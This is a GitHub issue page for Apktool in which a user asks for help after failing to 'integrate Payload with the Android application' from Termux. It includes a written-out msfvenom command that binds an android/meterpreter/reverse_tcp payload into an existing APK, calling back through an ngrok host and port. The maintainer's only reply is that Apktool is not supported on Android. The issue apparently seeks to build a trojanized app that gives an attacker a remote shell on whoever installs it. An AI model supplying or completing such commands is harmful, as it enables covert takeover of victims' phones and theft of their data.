iBotPeaches / Apktool

A tool for reverse engineering Android apk files

Home Page:https://apktool.org/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

[BUG]Hello, I am suffering from the problem of not being able to integrate Payload with the Android application. I searched on several sites and did not find the solution, Knowing that I installed the version and it did not work every time I was asked to install 2.9.2

ebrahimalamry17 opened this issue · comments

Information

  1. Apktool Version (apktool -version) -2.9.2
  2. Operating System (Mac, Linux, Windows) -Linux
  3. APK From? (Playstore, ROM, Other) -termux
  4. Java Version (java --version) -openjdk 17.0.10 2024-01-16
    OpenJDK Runtime Environment (build 17.0.10+7-Debian-1)
    OpenJDK 64-Bit Server VM (build 17.0.10+7-Debian-1, mixed mode, sharing)

Stacktrace/Logcat

Include stacktrace here

Steps to Reproduce

  1. apktool

Frameworks

If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files samsung
(.apks that live in /system/framework or /system/priv-app)

APK

If this APK can be freely shared, please upload/attach a link to it.

Questions to ask before submi

Screenshot_٢٠٢٤٠٤٢٥-٠٠٤٨٢٥_Termux

I also tried using it with a tool msfvenom And it didn't work...
msfvenom -x /speed.apk -p android/meterpreter/reverse_tcp LHOST=1.tcp.eu.ngrok.io LPORT=15885 -o /sdcard.apk

Apktool is not officially supported on Android devices.